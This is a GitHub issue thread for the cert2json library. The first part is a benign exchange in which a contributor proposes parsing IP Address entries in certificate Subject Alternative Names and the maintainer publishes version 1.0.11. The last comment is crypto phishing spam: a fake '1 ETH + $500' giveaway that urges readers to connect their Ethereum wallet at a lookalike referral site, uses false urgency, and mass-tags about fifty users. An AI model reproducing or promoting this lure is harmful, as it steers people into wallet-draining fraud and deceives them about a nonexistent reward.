### ISSUE TITLE
Manage IP Address in SAN attributes

### ISSUE THREAD

**Issue by fpercke** [philwantsfish/cert2json#1]
Hello Philwantsfish,

Can you add IP Address handling in SAN attributes ? 
Certificates with IP Address SAN attributes throw this exception "Error: error parsing extension Subject Alternative Name. No support for cont [ 7 ]"

Here is the way to do it :
certificates.js / parseExtension_SubjectAlternativeName()  / switch : add 
```case "cont [ 7 ]": return nameToken.value.toJSON().data.join('.')```

Thanks

**Comment by philwantsfish** [comment]
HI fpercke, thank you for the solution. Can you open a pull request with this addition?

**Comment by philwantsfish** [comment]
Done, thank you!

**Comment by fpercke** [comment]
Hi Philwantsfish ! I didn't update the version because I didn't know about the number you wanted. Is it possible to update the version and push to npm ? Tell me if you want me to do the PR (and which version number you would want).
Thanks

**Comment by philwantsfish** [comment]
Hey, I just published 1.0.11 with your changes. Thanks again.

**Comment by fpercke** [comment]
Got it ! Thanks ;)

**Comment by pisgo** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
jamesgeorge007, @DickyKwok, @rands0n, @alexismoreau, @lengxuehan, @developeron29, @mea05key, @antaintan, @SergeyDNazarov, @ayansome1, @ZionHsc, @jeffzro, @MattyAB, @ashinzekene, @D3Portillo, @pkthebud, @lai3d, @stephensilber, @Haras133571, @xuwf, @KevinRamsunder, @xgrommx, @Jsming-G, @ronghuang0, @Linusaronsson, @CPPAlien, @kikaoki, @JaceLu, @nuriyevu, @SudipSinha, @maciej-ziolkowski, @jaeh, @gnperdue, @jzhe886, @otharwa, @iarizmendialvarez, @claudio-viola, @yujiimt, @Igglybuff, @pppluto, @278100089, @jbgosselin, @ahracho, @snowy520, @unbanksytv, @doublemacro, @daniel-s-ingram, @georgiIvanov, @sponnusa, @bukinoshita
